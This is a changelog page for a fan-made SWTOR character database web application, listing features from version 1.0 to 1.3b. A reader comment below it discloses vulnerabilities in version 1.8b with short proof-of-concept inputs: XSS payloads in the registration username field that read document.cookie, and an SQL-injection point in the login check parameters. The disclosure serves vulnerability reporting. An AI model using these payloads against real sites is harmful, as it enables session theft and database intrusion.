Changelog

v1.0 / Initial Release

Basic Functionality has been tested and is stable.

  • Semi-Automated Setup Process
  • Add Characters
  • Edit Characters
  • Main Character Listing (home page)
  • Admin Login/Out

v1.1 / Update 1

  • Improved visuals, header area with graphical logo
  • Consistency across pages
  • Hidden passwords on the login form

v1.1b / Update 1, part 2

  • Selection lists on the add and edit character screen are now polled from the internal database instead of hand-typed
  • Edit character screen will now “remember” the character’s race, class, advanced class, and all 3 skills
  • Further consistency changes (added a consistent footer and added header on more pages)

1.2 / Major Upgrade

  • Added Support for Social Ranks
  • Added Support for Alignment (Light/Neutral/Dark)
  • Added Support for Honor Ranks
  • Ability for admins to delete characters
  • Ability to select which columns appear on Character Listing
  • JavaScript Table Sorting on Character Listing

1.3 / Upgrade

  • Footer added to most pages
  • Ability for users to register on the db
  • Ability for users to add own characters (Association to account which created the character in DB)
  • Enabled Administrator ability to change username when registering

1.3b / Minor Upgrade

  • Ability to Edit Users

2 comments on “Changelog”

  1. Hi,

    I’ve found some security vulnerabilities in version 1.8b of SWTOR CharDB

    Here are the PoC:

    ==================
    PoC-Exploit
    ==================

    // XSS
    http://target/swtor/user/register.php
    Username: alert(document.cookie)
    Password: whatever

    // Stored XSS
    http://target/swtor/user/register.php
    Username: 1–>1alert(document.cookie)<!–
    Password: whatever

    Visit: http://target/swtor/index.php?view=members

    // SQL-Injection
    http://target/swtor/user/login_check.php?swtorpw=1&swtorun=sql injection]

    Advisory: http://www.darksecurity.de/advisories/2012/SSCHADV2012-009.txt
